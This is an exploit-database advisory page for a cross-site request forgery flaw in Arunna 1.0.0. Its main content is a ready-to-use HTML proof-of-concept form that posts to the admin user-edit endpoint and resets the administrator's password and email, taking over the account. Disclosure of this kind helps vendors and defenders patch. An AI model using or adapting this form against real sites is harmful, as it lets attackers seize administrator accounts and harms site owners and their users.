Arunna 1.0.0 Cross Site Request Forgery

2021.12.17
Credit: L_L
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF) # Date: November 29, 2021 # Exploit Author: =(L_L)= # Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ # Vendor Homepage: https://github.com/arunna # Software Link: https://github.com/arunna/arunna # Version: 1.0.0 # Tested on: Ubuntu 20.04.2 LTS <!-- The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). --> <html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr> <tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr> <tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr> <tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr> <tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr> <tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr> <tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr> <tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr> <tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr> <tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr> <tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr> <tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr> <tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr> <tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr> <tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr> <tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr> <tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr> <tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr> <tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr> <tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr> <tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr> </table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top